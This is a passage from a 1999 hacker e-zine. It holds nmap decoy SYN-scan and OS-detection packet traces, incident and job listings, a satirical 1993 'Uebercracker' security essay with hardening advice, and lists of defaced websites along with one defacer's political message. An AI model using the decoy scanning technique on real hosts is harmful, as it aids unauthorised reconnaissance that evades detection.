audit.example.com.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024 19:44:00.404222 24.24.24.24.38139 > www.example.com.http: S 1559207492:1559207492(0) win 1024 SYN+ACK response means open port here. We RST appropriately. Note: If you use valid decoys they will RST as well. 19:44:00.424222 www.example.com.http > audit.example.com.38139: S 3305543706:3305543706(0) ack 1559207493 win 9112 (DF) 19:44:00.424222 audit.example.com.38139 > www.example.com.http: R 1559207493:1559207493(0) win 0 Interesting ports on www.example.com (1.1.1.1): Port State Protocol Service 80 open tcp http Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds Decoys, OS detection [audit ~]# nmap -sS -D23.23.23.23,ME,24.24.24.24 -O -p 80 www.example.com Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) ICMP Probe 19:29:55.854222 23.23.23.23 > www.example.com: icmp: echo request 19:29:55.864222 audit.example.com > www.example.com: icmp: echo request 19:29:55.864222 24.24.24.24 > www.example.com: icmp: echo request ACK Probe 19:29:55.864222 23.23.23.23.63836 > www.example.com.http: . ack 0 win 1024 19:29:55.874222 audit.example.com.63836 > www.example.com.http: . ack 0 win 1024 19:29:55.874222 24.24.24.24.63836 > www.example.com.http: . ack 0 win 1024 Wooop got your nose!@#$ 19:29:55.884222 www.example.com.http > audit.example.com.63836: R 0:0(0) win 0 (DF) SYN scan 19:29:55.954222 23.23.23.23.63816 > www.example.com.http: S 1315816470:1315816470(0) win 1024 19:29:55.964222 audit.example.com.63816 > www.example.com.http: S 1315816470:1315816470(0) win 1024 19:29:55.964222 24.24.24.24.63816 > www.example.com.http: S 1315816470:1315816470(0) win 1024 SYN+ACK response means open port here. We RST appropriately. Note: If you use valid decoys they will RST as well. 19:29:55.974222 www.example.com.http > audit.example.com.63816: S 3191891171:3191891171(0) ack 1315816471 win 9112 (DF) 19:29:55.974222 audit.example.com.63816 > www.example.com.http: R 1315816471:1315816471(0) win 0 OS Detection (Solaris shown) 19:29:55.984222 23.23.23.23.63823 > www.example.com.http: S 3812808641:3812808641(0) win 1024 19:29:55.984222 audit.example.com.63823 > www.example.com.http: S 3812808641:3812808641(0) win 1024 19:29:55.984222 24.24.24.24.63823 > www.example.com.http: S 3812808641:3812808641(0) win 1024 19:29:55.984222 23.23.23.23.63824 > www.example.com.http: . win 1024 19:29:55.984222 audit.example.com.63824 > www.example.com.http: . win 1024 19:29:55.984222 24.24.24.24.63824 > www.example.com.http: . win 1024 19:29:55.994222 23.23.23.23.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0 19:29:55.994222 audit.example.com.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0 19:29:55.994222 24.24.24.24.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0 19:29:55.994222 23.23.23.23.63826 > www.example.com.http: . ack 0 win 1024 19:29:55.994222 www.example.com.http > audit.example.com.63823: S 3192034216:3192034216(0) ack 3812808642 win 8855 (DF) 19:29:55.994222 audit.example.com.63823 > www.example.com.http: R 3812808642:3812808642(0) win 0 19:29:56.004222 audit.example.com.63826 > www.example.com.http: . ack 0 win 1024 19:29:56.004222 24.24.24.24.63826 > www.example.com.http: . ack 0 win 1024 19:29:56.004222 23.23.23.23.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024 19:29:56.004222 audit.example.com.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024 19:29:56.004222 24.24.24.24.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024 19:29:56.004222 23.23.23.23.63828 > www.example.com.34599: . ack 0 win 1024 19:29:56.014222 audit.example.com.63828 > www.example.com.34599: . ack 0 win 1024 19:29:56.014222 24.24.24.24.63828 > www.example.com.34599: . ack 0 win 1024 19:29:56.014222 23.23.23.23.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0 19:29:56.014222 audit.example.com.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0 19:29:56.014222 24.24.24.24.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0 19:29:56.014222 23.23.23.23.63816 > www.example.com.34599: udp 300 19:29:56.014222 www.example.com.http > audit.example.com.63826: R 0:0(0) win 0 (DF) 19:29:56.024222 audit.example.com.63816 > www.example.com.34599: udp 300 19:29:56.024222 24.24.24.24.63816 > www.example.com.34599: udp 300 19:29:56.634222 23.23.23.23.63824 > www.example.com.http: . win 1024 19:29:56.644222 audit.example.com.63824 > www.example.com.http: . win 1024 19:29:56.644222 24.24.24.24.63824 > www.example.com.http: . win 1024 19:29:56.644222 23.23.23.23.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0 19:29:56.644222 audit.example.com.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0 19:29:56.644222 24.24.24.24.63825 > www.example.com.http: SFP 3812808641:3812808641(0) win 1024 urg 0 19:29:56.644222 23.23.23.23.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024 19:29:56.644222 audit.example.com.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024 19:29:56.654222 24.24.24.24.63827 > www.example.com.34599: S 3812808641:3812808641(0) win 1024 19:29:56.654222 23.23.23.23.63828 > www.example.com.34599: . ack 1 win 1024 19:29:56.654222 audit.example.com.63828 > www.example.com.34599: . ack 1 win 1024 19:29:56.654222 24.24.24.24.63828 > www.example.com.34599: . ack 1 win 1024 19:29:56.654222 23.23.23.23.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0 19:29:56.654222 audit.example.com.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0 19:29:56.654222 24.24.24.24.63829 > www.example.com.34599: FP 3812808641:3812808641(0) win 1024 urg 0 19:29:56.664222 23.23.23.23.63816 > www.example.com.34599: udp 300 19:29:56.664222 audit.example.com.63816 > www.example.com.34599: udp 300 19:29:56.664222 24.24.24.24.63816 > www.example.com.34599: udp 300 Sequencing (hey with bsd TTCP and the Linux messup, who needs sequencing? :) 19:29:57.184222 23.23.23.23.63817 > www.example.com.http: S 3812808642:3812808642(0) win 1024 19:29:57.204222 audit.example.com.63817 > www.example.com.http: S 3812808642:3812808642(0) win 1024 19:29:57.214222 www.example.com.http > audit.example.com.63817: S 3192528068:3192528068(0) ack 3812808643 win 9112 (DF) 19:29:57.214222 audit.example.com.63817 > www.example.com.http: R 3812808643:3812808643(0) win 0 19:29:57.224222 24.24.24.24.63817 > www.example.com.http: S 3812808642:3812808642(0) win 1024 19:29:57.244222 23.23.23.23.63818 > www.example.com.http: S 3812808643:3812808643(0) win 1024 19:29:57.264222 audit.example.com.63818 > www.example.com.http: S 3812808643:3812808643(0) win 1024 19:29:57.274222 www.example.com.http > audit.example.com.63818: S 3192724219:3192724219(0) ack 3812808644 win 9112 (DF) 19:29:57.274222 audit.example.com.63818 > www.example.com.http: R 3812808644:3812808644(0) win 0 19:29:57.284222 24.24.24.24.63818 > www.example.com.http: S 3812808643:3812808643(0) win 1024 19:29:57.304222 23.23.23.23.63819 > www.example.com.http: S 3812808644:3812808644(0) win 1024 19:29:57.324222 audit.example.com.63819 > www.example.com.http: S 3812808644:3812808644(0) win 1024 19:29:57.334222 www.example.com.http > audit.example.com.63819: S 3192958008:3192958008(0) ack 3812808645 win 9112 (DF) 19:29:57.334222 audit.example.com.63819 > www.example.com.http: R 3812808645:3812808645(0) win 0 19:29:57.344222 24.24.24.24.63819 > www.example.com.http: S 3812808644:3812808644(0) win 1024 19:29:57.364222 23.23.23.23.63820 > www.example.com.http: S 3812808645:3812808645(0) win 1024 19:29:57.384222 audit.example.com.63820 > www.example.com.http: S 3812808645:3812808645(0) win 1024 19:29:57.394222 www.example.com.http > audit.example.com.63820: S 3193157286:3193157286(0) ack 3812808646 win 9112 (DF) 19:29:57.394222 audit.example.com.63820 > www.example.com.http: R 3812808646:3812808646(0) win 0 19:29:57.404222 24.24.24.24.63820 > www.example.com.http: S 3812808645:3812808645(0) win 1024 19:29:57.424222 23.23.23.23.63821 > www.example.com.http: S 3812808646:3812808646(0) win 1024 19:29:57.444222 audit.example.com.63821 > www.example.com.http: S 3812808646:3812808646(0) win 1024 19:29:57.454222 www.example.com.http > audit.example.com.63821: S 3193331920:3193331920(0) ack 3812808647 win 9112 (DF) 19:29:57.454222 audit.example.com.63821 > www.example.com.http: R 3812808647:3812808647(0) win 0 19:29:57.464222 24.24.24.24.63821 > www.example.com.http: S 3812808646:3812808646(0) win 1024 19:29:57.484222 23.23.23.23.63822 > www.example.com.http: S 3812808647:3812808647(0) win 1024 19:29:57.504222 audit.example.com.63822 > www.example.com.http: S 3812808647:3812808647(0) win 1024 19:29:57.514222 www.example.com.http > audit.example.com.63822: S 3193574611:3193574611(0) ack 3812808648 win 9112 (DF) 19:29:57.514222 audit.example.com.63822 > www.example.com.http: R 3812808648:3812808648(0) win 0 19:29:57.524222 24.24.24.24.63822 > www.example.com.http: S 3812808647:3812808647(0) win 1024 Interesting ports on www.example.com (1.1.1.1): Port State Protocol Service 80 open tcp http TCP Sequence Prediction: Class=random positive increments Difficulty=25258 (Worthy challenge) Remote operating system guess: Solaris 2.6 - 2.7 Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds Thanks for reading, have fun! @HWA 59.0 Security Focus: Incidents Summary ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ IV. INCIDENTS SUMMARY 1999-08-16 to 1999-08-22 ------------------------------------------ 1. investigating Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&msg=002301bee915$8587b100$2b81fea9@tarleton.edu 2. kiddie attack via http Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&thread=Pine.NEB.3.96.990819111619.20441B-100000@mach.unseen.org 3. Asaka (was Re: kiddie attack via http) Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&thread=37BC586C.42EF65E0@globalstar.com 4. Re: investigating Relevant URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-08-15&msg=Pine.GSO.4.05.9908211843310.2417-100000@toutatis.comune.modena.it 60.0 Security Focus: Jobs ~~~~~~~~~~~~~~~~~~~~ V. SECURITY JOBS 1999-08-16 to 1999-08-22 ------------------------------------- Seeking Position: 1:Contact: jam smith Qualifications:http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&thread=385620377.935021596329.JavaMail.root@web09.mail.com Date Posted: 1999-08-18 Seeking Staff: 2. Position: mid-level Network Security Engineer Reply to: Chris Riley Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=37B825AD.8064E6F8@info-tools.com Date Posted: 1999-08-16 3. Position: senior networking staff Reply to: Vince Reed Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=v04210105b3e090fa310b@[128.29.230.9] Date Posted: 1999-08-17 4. Position: Security Engineer Reply to: Hal Lockhart Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=9D8B3C643D2AD311BC8D00508B120BA40F5ACC@mahqexc01.storagenetworks.com Date Posted: 1999-08-18 5. Position: Security Engineer Reply to: Ben Keepper Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=000f01bee9f8$1903e740$d9990018@cv1.sdca.home.com Date Posted: 1999-08-18 6. Position: Security Consultant Reply to: Bryan Bushman Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=0013A20F.4077@capitalone.com Date Posted: 1999-08-18 7. Position: Network Security Administrator Reply to: Wooldridge, Doug Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=35AB03C74901D2119DAA00A0C9B6A1FB9576DD@exchange5.echostar.com Date Posted: 1999-08-19 8. Position: Project Leader, Team Leader, and Security Engineers Reply to: Eric Maiwald Position Requirements: http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-08-15&msg=Pine.GSO.3.96.990820141043.8181A-100000@ss5.fred.net Date Posted: 1999-08-20 @HWA -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............ An oldie but goodie, noone's sending in submissions, c'mon you know you wanna...- Ed A Guide to Internet Security: Becoming an Uebercracker and Becoming an UeberAdmin to stop Uebercrackers. Author: Christopher Klaus Date: December 5th, 1993. Version: 1.1 This is a paper will be broken into two parts, one showing 15 easy steps to becoming a uebercracker and the next part showing how to become a ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased by Dan Farmer to refer to some elite (cr/h)acker that is practically impossible to keep out of the networks. Here's the steps to becoming a uebercracker. Step 1. Relax and remain calm. Remember YOU are a Uebercracker. Step 2. If you know a little Unix, you are way ahead of the crowd and skip past step 3. Step 3. You may want to buy Unix manual or book to let you know what ls,cd,cat does. Step 4. Read Usenet for the following groups: alt.irc, alt.security, comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background in uebercracker culture. Step 5. Ask on alt.irc how to get and compile the latest IRC client and connect to IRC. Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way there!) Step 7. Now, sit on #hack and send messages to everyone in the channel saying "Hi, Whats up?". Be obnoxious to anyone else that joins and asks questions like "Why cant I join #warez?" Step 8. (Important Step) Send private messages to everyone asking for new bugs or holes. Here's a good pointer, look around your system for binary programs suid root (look in Unix manual from step 3 if confused). After finding a suid root binary, (ie. su, chfn, syslog), tell people you have a new bug in that program and you wrote a script for it. If they ask how it works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask them to trade for their get-root scripts. Step 9. Make them send you some scripts before you send some garbage file (ie. a big core file). Tell them it is encrypted or it was messed up and you need to upload your script again. Step 10. Spend a week grabbing all the scripts you can. (Dont forget to be obnoxious on #hack otherwise people will look down on you and not give you anything.) Step 11. Hopefully you will now have atleast one or two scripts that get you root on most Unixes. Grab root on your local machines, read your admin's mail, or even other user's mail, even rm log files and whatever temps you. (look in Unix manual from step 3 if confused). Step 12. A good test for true uebercrackerness is to be able to fake mail. Ask other uebercrackers how to fake mail (because they have had to pass the same test). Email your admin how "layme" he is and how you got root and how you erased his files, and have it appear coming from satan@evil.com. Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are a uebercracker.) Step 14. Wait a few months and have all your notes, etc ready in your room for when the FBI, Secret Service, and other law enforcement agencies confinscate your equipment. Call eff.org to complain how you were innocent and how you accidently gotten someone else's account and only looked because you were curious. (Whatever else that may help, throw at them.) Step 15. Now for the true final supreme eliteness of all uebercrackers, you go back to #hack and brag about how you were busted. YOU are finally a true Uebercracker. Now the next part of the paper is top secret. Please only pass to trusted administrators and friends and even some trusted mailing lists, Usenet groups, etc. (Make sure no one who is NOT in the inner circle of security gets this.) This is broken down on How to Become an UeberAdmin (otherwise know as a security expert) and How to stop Uebercrackers. Step 1. Read Unix manual ( a good idea for admins ). Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers now. Rdist scripts is among the favorites for getting root by uebercrackers. Step 3. Okay, maybe you want to actually secure your machine from the elite Uebercrackers who can break into any site on Internet. Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing packets. (This only applies to advanced admins who have control of the router, but this will stop 90% of all uebercrackers from attempting your site.) Step 5. Apply all CERT and vendor patches to all of your machines. You have just now killed 95% of all uebercrackers. Step 6. Run a good password cracker to find open accounts and close them. Run tripwire after making sure your binaries are untouched. Run tcp_wrapper to find if a uebercracker is knocking on your machines. Run ISS to make sure that all your machines are reasonably secure as far as remote configuration (ie. your NFS exports and anon FTP site.) Step 7. If you have done all of the following, you will have stopped 99% of all uebercrackers. Congrads! (Remember, You are the admin.) Step 8. Now there is one percent of uebercrackers that have gained knowledge from reading some security expert's mail (probably gained access to his mail via NFS exports or the guest account. You know how it is, like the mechanic that always has a broken car, or the plumber that has the broken sink, the security expert usually has an open machine.) Step 9. Here is the hard part is to try to convince these security experts that they are not so above the average citizen and that by now giving out their unknown (except for the uebercrackers) security bugs, it would be a service to Internet. They do not have to post it on Usenet, but share among many other trusted people and hopefully fixes will come about and new pressure will be applied to vendors to come out with patches. Step 10. If you have gained the confidence of enough security experts, you will know be a looked upto as an elite security administrator that is able to stop most uebercrackers. The final true test for being a ueberadmin is to compile a IRC client, go onto #hack and log all the bragging and help catch the uebercrackers. If a uebercracker does get into your system, and he has used a new method you have never seen, you can probably tell your other security admins and get half of the replies like - "That bug been known for years, there just isn't any patches for it yet. Here's my fix." and the other half of the replies will be like - "Wow. That is very impressive. You have just moved up a big notch in my security circle." VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups mention anything about that security hole, Flame him for discussing it since it could bring down Internet and all Uebercrackers will now have it and the million other reasons to keep everything secret about security. Well, this paper has shown the finer details of security on Internet. It has shown both sides of the coin. Three points I would like to make that would probably clean up most of the security problems on Internet are as the following: 1. Vendors need to make security a little higher than zero in priority. If most vendors shipped their Unixes already secure with most known bugs that have been floating around since the Internet Worm (6 years ago) fixed and patched, then most uebercrackers would be stuck as new machines get added to Internet. (I believe Uebercracker is german for "lame copy-cat that can get root with 3 year old bugs.") An interesting note is that if you probably check the mail alias for "security@vendor.com", you will find it points to /dev/null. Maybe with enough mail, it will overfill /dev/null. (Look in manual if confused.) 2. Security experts giving up the attitude that they are above the normal Internet user and try to give out information that could lead to pressure by other admins to vendors to come out with fixes and patches. Most security experts probably don't realize how far their information has already spread. 3. And probably one of the more important points is just following the steps I have outlined for Stopping a Uebercracker. Resources for Security: Many security advisories are available from anonymous ftp cert.org. Ask archie to find tcp_wrapper, security programs. For more information about ISS (Internet Security Scanner), email cklaus@shadow.net. Acknowledgements: Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott Miles, Scott Yelich, and Henri De Valois. Copyright: This paper is Copyright 1993, 1994. Please distribute to only trusted people. If you modify, alter, disassemble, reassemble, re-engineer or have any suggestions or comments, please send them to: cklaus@shadow.net @HWA SITE.1 #1 http://whitehats.com/ This is a newish security site (at least its new to me) that has many IDS signatures online for download for use with SNORT (a gnu IDS tool) also a good discussion on the NMAP tool's ability to scan undetected by the target host (see #58). - Ed #2 http://www.immortalz.com/ New security site reborn with a new layout will be up within a week, check it out ... soon to mirror the HWA zine too. ;-) @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Latest cracked pages courtesy of attrition.org [99.08.23] NT [ ] MediaMark (www.mediamark.com) [99.08.23] So [bl0w team] Thinking Pictures, Inc. (www.thinkpix.com) [99.08.23] So [bl0w team] Rock.com's Rolling Stone's Web site (www.stones.com) [99.08.23] NT [v00d00] Odin Radiators (www.odinradiators.com.au) [99.08.23] BI [team_hM] Monica Lewinsky's site (www.monicalewinsky.com) [99.08.23] NT [139_r00ted] Concept Reseau (www.concept-reseau.fr) [99.08.23] Li [Uneek Tech] Ruchi Group (www.ruchigroup.com) [99.08.23] NT [139_r00ted] Phoenix Data Systems (www.phoenixds.at) [99.08.23] NT [139_r00ted] Concept Reseau (www.concept-reseau.fr) [99.08.23] Li [Uneek Tech] Ruchi Group (www.ruchigroup.com) [99.08.23] NT [139_r00ted] Phoenix Data Systems (www.phoenixds.at) [99.08.25] NT [wkD] PC Guk (www.pcguk.com) [99.08.25] [DISO] Nullsoft SHOUTcast (yp.shoutcast.com) [99.08.24] Ir [Uneek Tech] Aston Packaging (www.astonpackaging.co.uk) [99.08.24] Ir [Uneek Tech] All Art (www.allart.co.uk) [99.08.24] NT [ ] 1st Stop Inc (www.1ststopinc.com) [99.08.24] NT [139_r00ted] Scanres (SE) (www.scanres.se) [99.08.24] Li [GOD] #2 Madison Square Garden (www.thegarden.com) [99.08.26] [HwC] M Zipper (www.zipper.de) [99.08.26] NT [aL3X] M Cindy Jackson (www.cindyjackson.co.uk) [99.08.26] Li [stormtrooper] Red Hat Indonesia (www.redhat.or.id) [99.08.26] Fb [ ] No Such Agency (www.nsa.org) [99.08.26] NT [Fuby] CyberElf (www.cyberelf.com) [99.08.26] Fb [ ] Official Web site of Limp Bizkit (www.limpbizkit.com) [99.08.26] So [ ] Cornell Theory Center (cedar.tc.cornell.edu) [99.08.26] [wkD] M Lookie Here (lookiehere.com) [99.08.26] [ ] OE Pages (www.oe-pages.com) [99.08.26] NT [cynic] Peter Mueller's Web Site (www.petermueller.com) [99.08.26] NT [v00d00] WoodSBC (www.woodsbc.com.au) [99.08.25] [ ] TLM (www.tlm.com.br) [99.08.25] NT [139_r00ted] M IT Media Design (www.itmediadesign.com) [99.08.25] NT [Uneek Tech] Tomrods LTD Steel Stockholders (www.tomrods.co.uk) [99.08.25] Ir [Uneek Tech] Sescoi (www.sescoi.co.uk) [99.08.25] NT [Uneek Tech] Litho Supplies (www.litho.co.uk) [99.08.26] [HwC] M Zipper (www.zipper.de) [99.08.26] NT [aL3X] M Cindy Jackson (www.cindyjackson.co.uk) [99.08.26] Li [stormtrooper] Red Hat Indonesia (www.redhat.or.id) [99.08.26] Fb [ ] No Such Agency (www.nsa.org) [99.08.26] NT [Fuby] CyberElf (www.cyberelf.com) [99.08.26] Fb [ ] Official Web site of Limp Bizkit (www.limpbizkit.com) [99.08.26] So [ ] Cornell Theory Center (cedar.tc.cornell.edu) [99.08.26] [wkD] M Lookie Here (lookiehere.com) [99.08.26] [ ] OE Pages (www.oe-pages.com) [99.08.26] NT [cynic] Peter Mueller's Web Site (www.petermueller.com) [99.08.26] NT [v00d00] WoodSBC (www.woodsbc.com.au) [99.08.25] [ ] TLM (www.tlm.com.br) [99.08.25] NT [139_r00ted] M IT Media Design (www.itmediadesign.com) [99.08.25] NT [Uneek Tech] Tomrods LTD Steel Stockholders (www.tomrods.co.uk) [99.08.25] Ir [Uneek Tech] Sescoi (www.sescoi.co.uk) [99.08.25] NT [Uneek Tech] Litho Supplies (www.litho.co.uk) Defaced: http://www.cmtc.7atc.army.mil/ (7th Army Training Command, Bavaria, Germany) By: 139_rooted Mirror: http://www.attrition.org/mirror/attrition/mil/www.cmtc.7atc.army.mil/ OS: NT Hacked: http://vax.mtc.irisz.hu By: Elfoscuro Mirror: http://www.attrition.org/mirror/attrition/hu/vax.mtc.irisz.hu/ OS: NT Defaced: http://www.mndm.gov.on.ca Ontario Ministry of Northern Development and Mines By: Sarin Mirror: http://www.attrition.org/mirror/attrition/ca/www.mndm.gov.on.ca OS: NT Hacked: http://www.thegarden.com (Madison Square Garden) By: Kindred Hackers Mirror: http://www.attrition.org/mirror/attrition/com/www.thegarden.com/ OS: Linux Hacked: http://www.webdoctor.com By: Sistom Mirror: http://www.attrition.org/mirror/attrition/com/www.webdoctor.com/ OS: Linux Hacked: http://www.uis.wayne.edu By: Unknown Mirror: http://www.attrition.org/mirror/attrition/edu/www.uis.wayne.edu/ OS: NT --- Hacked: http://www.prim-nov.si By: Mozy Mirror: http://www.attrition.org/mirror/attrition/si/www.prim-nov.si/ OS: NT This is the first Web defacement for the country of Slovenia. Slovenia is surrounded by Austria to the northwest, Hungary to the northeast, Italy to the west, and Croatia to the southeast. More info about Slovenia here: http://www.odci.gov/cia/publications/factbook/si.html --- Hacked: http://vax.mtc.irisz.hu By: Elfoscuro Mirror: http://www.attrition.org/mirror/attrition/hu/vax.mtc.irisz.hu/ OS: NT Hacked: http://mp3town.com By: w4t0 Mirror: http://www.attrition.org/mirror/attrition/com/mp3town.com/ OS: Linux Hacked: http://www.westga.edu By: W4t0 Mirror: http://www.attrition.org/mirror/attrition/edu/www.westga.edu/ OS: Solaris Ontario Ministry of Northern Development and Mines (www.mndm.gov.on.ca) Zipper (www.zipper.de) Cindy Jackson (www.cindyjackson.co.uk) Red Hat Indonesia (www.redhat.or.id) No Such Agency (www.nsa.org) CyberElf (www.cyberelf.com) Official Web site of Limp Bizkit (www.limpbizkit.com) Cornell Theory Center (cedar.tc.cornell.edu) Lookie Here (lookiehere.com) OE Pages (www.oe-pages.com) Peter Mueller's Web Site (www.petermueller.com) WoodSBC (www.woodsbc.com.au) TLM (www.tlm.com.br) IT Media Design (www.itmediadesign.com) Tomrods LTD Steel Stockholders (www.tomrods.co.uk) Sescoi (www.sescoi.co.uk) The message from the Monica Lewinsky hack; Greetings bastards. Over the last few months, we have been lead to believe that Slobodan Milosevic , the leader of the former Yugoslavia is the worst violator of Human Rights in the world. Well, that isn't an entirely true statement. Although Slobodan Milosevic is a huge violator of Human Rights, there is a much bigger problem in China, and it's been going on for decades. However, the politicians of America decide to overlook their violations just because of large campaign contributions and trade value. Since the days of the Carter administration China has been openly abusing its people. They limit how many children a family can have , and how the people can live their lives. The Chinese government kills anyone who opposes or speaks out against it. The Chinese government defies international Human Rights laws openly and admits to it. The Chinese government has a worse Human Rights record than Slobodan Milosevic , yet nobody questions them. Just last month , its been reported that political prisoners in China have been subjected to sexual tortures and later executed. In fact, earlier this month, President Clinton actually had Chinese Premier Zhu Rongji to the white house for talks on entering the World Trade Organization.Bill Clinton even said at a press confrence with China's Premier Zhu Rongji ,"We honor China's remarkable achievements, its greater prosperity and the greater range of personal choices available to its citizens, as well as the movement toward local democracy". When in fact there has been no change in China's view of human rights. The Chinese Government has placed severe restrictions on freedom of speech, the press, assembly, association, religion, privacy, as well as worker rights. Also , China has the most favored nation trade status. All of this has a lot of people wondering why there is a war in Yugoslavia , but none in China. However the answer to that is all too apparent , greed. It is true that Slobodan Milosevic, and his army, are carrying out horrible acts against people. They aren't being condoned at all. But, China engages in these same activities on a much larger scale, and just because they have money it's deemed acceptable by American political and corporate interests. Bill Clinton was eager to wage war when it would take the focus off of his bedroom practices, but he isn't so eager to do so when it will cost him valuable campaign contributions, and who knows what else. The Chinese people have attempted to cry out for help through The Internet and televison shows. However those caught emailing anyone outside of China are immediately imprisoned . Chinese Internet access is limited very strictly to pro-chinese sites, the government prevents anyone inside China from viewing anything else by cutting off the outside Internet. This is comparative to Slobodan Milosevic's use of the television to only display movies and shows which he chooses, or for him to spread political lies about other nations. However , there is one difference between China and Yugoslavia's use of censorship. China is a valuable trade nation, so there's must be all right , at least that's the message that is sent out by the United States Government. A lot of Human Rights are asking how these two nations , with very similar tendencies can be treated so much differently. Perhaps if China would have been the only ones in violation around the time of the Monica Lewinsky scandal things would be different. Or perhaps if they didn't have so many large investments in American corporations and government they would be being punished for their actions. It's terrible that Human Rights is like a commodity , to be sold to the highest bidder. In the end it all seems to be just another example of money controlling everything. As long as someone turns a profit, it's acceptable. But what if someone were getting right, by letting your government mistreat and abuse you? You would probably expect someone to stand up and defend you. But how can anyone expect that if they wont extend the same courtesy to someone else? Innocent people are allowed to be executed and persecuted just because their government can pay for it. It saddens me deeply to see that more people haven't taken a stand against the Chinese. But most people figure that since it isn't them it doesn't really happen. They think that if it were really that bad , something would have been done about it. They don't have the time to worry about other people. They sit back and watch the Politicians of America line their pockets with the blood of the Chinese people. It's become more and more apparent that society has no regard for the feelings and well being of others. But what if your freedom and rights were just dollars in someone else's pocket, and you lived as the Chinese people do. Things would probably be a little different then, at least in your eyes. another fine message brought to you by team_hM nEoGoD and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html 